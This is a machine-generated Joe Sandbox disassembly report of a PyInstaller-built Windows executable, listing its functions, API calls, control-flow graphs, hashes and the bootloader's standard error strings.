                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6E60A154F), ref: 00007FF6E60A79E7
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A7B60: GetEnvironmentVariableW.KERNEL32(00007FF6E60A3A1F), ref: 00007FF6E60A7B9A
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E60A7BB7
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60B7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B7E05
                                                                                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32 ref: 00007FF6E60A7AA1
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A2B30: MessageBoxW.USER32 ref: 00007FF6E60A2C05
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                              • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                              • Opcode ID: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
                                                                                                                                                                                                                                                              • Instruction ID: 8e085805400ee341231e36f1a781c42e5101e55e1f6030421991943bef92edf4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B51B167B3927341FD15A762AB113BA56515F88BD0F448431ED0ECB7DBEE2FE501820A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 792 7ff6e60c65ec-7ff6e60c6621 call 7ff6e60c5cf8 call 7ff6e60c5d00 call 7ff6e60c5d68 799 7ff6e60c675f-7ff6e60c67cd call 7ff6e60baec4 call 7ff6e60c1be8 792->799 800 7ff6e60c6627-7ff6e60c6632 call 7ff6e60c5d08 792->800 811 7ff6e60c67cf-7ff6e60c67d6 799->811 812 7ff6e60c67db-7ff6e60c67de 799->812 800->799 805 7ff6e60c6638-7ff6e60c6643 call 7ff6e60c5d38 800->805 805->799 813 7ff6e60c6649-7ff6e60c666c call 7ff6e60baf0c GetTimeZoneInformation 805->813 814 7ff6e60c686b-7ff6e60c686e 811->814 815 7ff6e60c67e0 812->815 816 7ff6e60c6815-7ff6e60c6828 call 7ff6e60bdbbc 812->816 823 7ff6e60c6734-7ff6e60c675e call 7ff6e60c5cf0 call 7ff6e60c5ce0 call 7ff6e60c5ce8 813->823 824 7ff6e60c6672-7ff6e60c6693 813->824 819 7ff6e60c67e3 call 7ff6e60c65ec 814->819 820 7ff6e60c6874-7ff6e60c687c call 7ff6e60c6370 814->820 815->819 830 7ff6e60c6833-7ff6e60c684e call 7ff6e60c1be8 816->830 831 7ff6e60c682a 816->831 833 7ff6e60c67e8-7ff6e60c6814 call 7ff6e60baf0c call 7ff6e60abcc0 819->833 820->833 828 7ff6e60c669e-7ff6e60c66a5 824->828 829 7ff6e60c6695-7ff6e60c669b 824->829 834 7ff6e60c66b9 828->834 835 7ff6e60c66a7-7ff6e60c66af 828->835 829->828 849 7ff6e60c6850-7ff6e60c6853 830->849 850 7ff6e60c6855-7ff6e60c6867 call 7ff6e60baf0c 830->850 836 7ff6e60c682c-7ff6e60c6831 call 7ff6e60baf0c 831->836 844 7ff6e60c66bb-7ff6e60c672f call 7ff6e60ad0e0 * 4 call 7ff6e60c31cc call 7ff6e60c6884 * 2 834->844 835->834 840 7ff6e60c66b1-7ff6e60c66b7 835->840 836->815 840->844 844->823 849->836 850->814
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C661A
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60C5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D7C
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C662B
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60C5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D1C
                                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6E60C663C
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60C5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60C5D4C
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C
                                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E60C687C), ref: 00007FF6E60C6663
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                              • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                              • Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                              • Instruction ID: 9d30d4f7660e0b02fd88b2d8993569dec19d203cf954fb2d4dfb6aa5cc4ef8a6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC51A633A3866286E720DF21DA807A97760FF48784F404635DA4EC7696DF3FE450875A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                                                              • Opcode ID: fa36b354e42833f2d480c1905b01057773dd646869fd5786630cfbf194765c39
                                                                                                                                                                                                                                                              • Instruction ID: d351c53ea56a3ae9da48ff146c625ec563778570c502adc7187217a1131f63e9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa36b354e42833f2d480c1905b01057773dd646869fd5786630cfbf194765c39
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA02B023B3D67740FE61AB6197083792680AF41B90F048635DD6FCA7D6DE7FA411832A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 7ff6e60a1710-7ff6e60a1724 1 7ff6e60a173e-7ff6e60a1742 0->1 2 7ff6e60a1726-7ff6e60a173d call 7ff6e60a2b30 0->2 4 7ff6e60a1744-7ff6e60a174d call 7ff6e60a12b0 1->4 5 7ff6e60a1768-7ff6e60a178b call 7ff6e60a7c10 1->5 11 7ff6e60a175f-7ff6e60a1767 4->11 12 7ff6e60a174f-7ff6e60a175a call 7ff6e60a2b30 4->12 13 7ff6e60a17b9-7ff6e60a17d4 call 7ff6e60a3fd0 5->13 14 7ff6e60a178d-7ff6e60a17b8 call 7ff6e60a2890 5->14 12->11 20 7ff6e60a17ee-7ff6e60a1801 call 7ff6e60b0814 13->20 21 7ff6e60a17d6-7ff6e60a17e9 call 7ff6e60a2b30 13->21 27 7ff6e60a1823-7ff6e60a1827 20->27 28 7ff6e60a1803-7ff6e60a181e call 7ff6e60a2890 20->28 26 7ff6e60a192f-7ff6e60a1932 call 7ff6e60b018c 21->26 35 7ff6e60a1937-7ff6e60a194e 26->35 31 7ff6e60a1841-7ff6e60a1861 call 7ff6e60b4f90 27->31 32 7ff6e60a1829-7ff6e60a1835 call 7ff6e60a1050 27->32 38 7ff6e60a1927-7ff6e60a192a call 7ff6e60b018c 28->38 40 7ff6e60a1863-7ff6e60a187d call 7ff6e60a2890 31->40 41 7ff6e60a1882-7ff6e60a1888 31->41 39 7ff6e60a183a-7ff6e60a183c 32->39 38->26 39->38 49 7ff6e60a191d-7ff6e60a1922 40->49 44 7ff6e60a188e-7ff6e60a1897 41->44 45 7ff6e60a1915-7ff6e60a1918 call 7ff6e60b4f7c 41->45 48 7ff6e60a18a0-7ff6e60a18c2 call 7ff6e60b04dc 44->48 45->49 52 7ff6e60a18f5-7ff6e60a18fc 48->52 53 7ff6e60a18c4-7ff6e60a18dc call 7ff6e60b0c1c 48->53 49->38 54 7ff6e60a1903-7ff6e60a190b call 7ff6e60a2890 52->54 59 7ff6e60a18de-7ff6e60a18e1 53->59 60 7ff6e60a18e5-7ff6e60a18f3 53->60 61 7ff6e60a1910 54->61 59->48 62 7ff6e60a18e3 59->62 60->54 61->45 62->61
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                                                              • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                                                              • Opcode ID: 58a8a0a2d0b9b9e18634d029908f9daef7cf58cf70176f6f913045e77eb385e3
                                                                                                                                                                                                                                                              • Instruction ID: d45d585ffb3fdfa556e6d8fd07de1ca91770b874c57f92bb9fd22318353075dc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58a8a0a2d0b9b9e18634d029908f9daef7cf58cf70176f6f913045e77eb385e3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F851D073B2866382EA109B11E6443B96390FF44BD4F444931EE0D8B696DF7FE244C70A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(0000000100000001,00007FF6E60A414C,00007FF6E60A7911,?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8990
                                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89A1
                                                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89C3
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A89CD
                                                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A0A
                                                                                                                                                                                                                                                              • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6E60A8A1C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A34
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A66
                                                                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6E60A8A8D
                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00007FF6E60A7D26,?,00007FF6E60A1785), ref: 00007FF6E60A8A9E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                                                              • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                                                              • API String ID: 4998090-2855260032
                                                                                                                                                                                                                                                              • Opcode ID: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                                                                                                                                                                                                                              • Instruction ID: ea9bc92c914b509a9baf538faacb4257858bbd806b47500e50e4bce337f384a6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB41A13362879682EB10DF50F5447AA7361FB847A0F540231EA6E876E8DF3EE448C705

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                              • API String ID: 677216364-1384898525
                                                                                                                                                                                                                                                              • Opcode ID: 8083ddb759eabe566319bd50f493096f90f8369961efa69fb93b49b040603606
                                                                                                                                                                                                                                                              • Instruction ID: 8bde2f530e9bd43afeeab9db6ce935cf2669bcd45e2f53299f72623545512319
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8083ddb759eabe566319bd50f493096f90f8369961efa69fb93b49b040603606
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B51B173A2962286EB24CF28D64427833A0EF48BC4B548935D90DC7799DF7FE540CB4A

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                              • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                              • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                              • Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                              • Instruction ID: 317def37816e1f8c49b81f930d4ea467224f163bc3be74941ca5366b919d0cde
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3417332A1878282DA20DB24E5553AAB364FF943A0F504335E6AE877D9DF7ED044CB05

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 381 7ff6e60a1000-7ff6e60a39d6 call 7ff6e60aff60 call 7ff6e60aff58 call 7ff6e60a86b0 call 7ff6e60aff58 call 7ff6e60abc60 call 7ff6e60b52f0 call 7ff6e60b5ef8 call 7ff6e60a1eb0 399 7ff6e60a3ad2 381->399 400 7ff6e60a39dc-7ff6e60a39ec call 7ff6e60a3ec0 381->400 401 7ff6e60a3ad7-7ff6e60a3af7 call 7ff6e60abcc0 399->401 400->399 406 7ff6e60a39f2-7ff6e60a3a05 call 7ff6e60a3d90 400->406 406->399 409 7ff6e60a3a0b-7ff6e60a3a32 call 7ff6e60a7b60 406->409 412 7ff6e60a3a74-7ff6e60a3a9c call 7ff6e60a8040 call 7ff6e60a1cb0 409->412 413 7ff6e60a3a34-7ff6e60a3a43 call 7ff6e60a7b60 409->413 424 7ff6e60a3b71-7ff6e60a3b82 412->424 425 7ff6e60a3aa2-7ff6e60a3ab8 call 7ff6e60a1cb0 412->425 413->412 419 7ff6e60a3a45-7ff6e60a3a4b 413->419 420 7ff6e60a3a57-7ff6e60a3a71 call 7ff6e60b4f7c call 7ff6e60a8040 419->420 421 7ff6e60a3a4d-7ff6e60a3a55 419->421 420->412 421->420 427 7ff6e60a3b9e-7ff6e60a3ba1 424->427 428 7ff6e60a3b84-7ff6e60a3b8b 424->428 440 7ff6e60a3af8-7ff6e60a3afb 425->440 441 7ff6e60a3aba-7ff6e60a3acd call 7ff6e60a2b30 425->441 432 7ff6e60a3ba3-7ff6e60a3ba9 427->432 433 7ff6e60a3bb7-7ff6e60a3bcf call 7ff6e60a8ae0 427->433 428->427 431 7ff6e60a3b8d-7ff6e60a3b90 call 7ff6e60a14f0 428->431 444 7ff6e60a3b95-7ff6e60a3b98 431->444 437 7ff6e60a3bef-7ff6e60a3bfc call 7ff6e60a6de0 432->437 438 7ff6e60a3bab-7ff6e60a3bb5 432->438 449 7ff6e60a3bd1-7ff6e60a3bdd call 7ff6e60a2b30 433->449 450 7ff6e60a3be2-7ff6e60a3be9 SetDllDirectoryW 433->450 451 7ff6e60a3bfe-7ff6e60a3c0b call 7ff6e60a6a90 437->451 452 7ff6e60a3c47-7ff6e60a3c4c call 7ff6e60a6d60 437->452 438->433 438->437 440->424 443 7ff6e60a3afd-7ff6e60a3b14 call 7ff6e60a3fd0 440->443 441->399 457 7ff6e60a3b16-7ff6e60a3b19 443->457 458 7ff6e60a3b1b-7ff6e60a3b47 call 7ff6e60a82b0 443->458 444->399 444->427 449->399 450->437 451->452 467 7ff6e60a3c0d-7ff6e60a3c1c call 7ff6e60a65f0 451->467 460 7ff6e60a3c51-7ff6e60a3c54 452->460 462 7ff6e60a3b56-7ff6e60a3b6c call 7ff6e60a2b30 457->462 458->424 473 7ff6e60a3b49-7ff6e60a3b51 call 7ff6e60b018c 458->473 465 7ff6e60a3d06-7ff6e60a3d15 call 7ff6e60a34c0 460->465 466 7ff6e60a3c5a-7ff6e60a3c67 460->466 462->399 465->399 483 7ff6e60a3d1b-7ff6e60a3d6f call 7ff6e60a7fd0 call 7ff6e60a7b60 call 7ff6e60a3620 call 7ff6e60a8080 call 7ff6e60a6840 call 7ff6e60a6d60 465->483 470 7ff6e60a3c70-7ff6e60a3c7a 466->470 481 7ff6e60a3c1e-7ff6e60a3c2a call 7ff6e60a6570 467->481 482 7ff6e60a3c3d-7ff6e60a3c42 call 7ff6e60a6840 467->482 474 7ff6e60a3c83-7ff6e60a3c85 470->474 475 7ff6e60a3c7c-7ff6e60a3c81 470->475 473->462 479 7ff6e60a3cd1-7ff6e60a3d01 call 7ff6e60a3620 call 7ff6e60a3460 call 7ff6e60a3610 call 7ff6e60a6840 call 7ff6e60a6d60 474->479 480 7ff6e60a3c87-7ff6e60a3caa call 7ff6e60a1ef0 474->480 475->470 475->474 479->401 480->399 495 7ff6e60a3cb0-7ff6e60a3cba 480->495 481->482 496 7ff6e60a3c2c-7ff6e60a3c3b call 7ff6e60a6c30 481->496 482->452 517 7ff6e60a3d71-7ff6e60a3d78 call 7ff6e60a7d40 483->517 518 7ff6e60a3d7d-7ff6e60a3d80 call 7ff6e60a1e80 483->518 500 7ff6e60a3cc0-7ff6e60a3ccf 495->500 496->460 500->479 500->500 517->518 521 7ff6e60a3d85-7ff6e60a3d87 518->521 521->401
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A3EC0: GetModuleFileNameW.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A3EF1
                                                                                                                                                                                                                                                              • SetDllDirectoryW.KERNEL32 ref: 00007FF6E60A3BE9
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A7B60: GetEnvironmentVariableW.KERNEL32(00007FF6E60A3A1F), ref: 00007FF6E60A7B9A
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E60A7BB7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                              • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                              • API String ID: 2344891160-3602715111
                                                                                                                                                                                                                                                              • Opcode ID: bd0b06326a7492ca6e80295eee68133b4651991604d025b60ce46eca4a378e7a
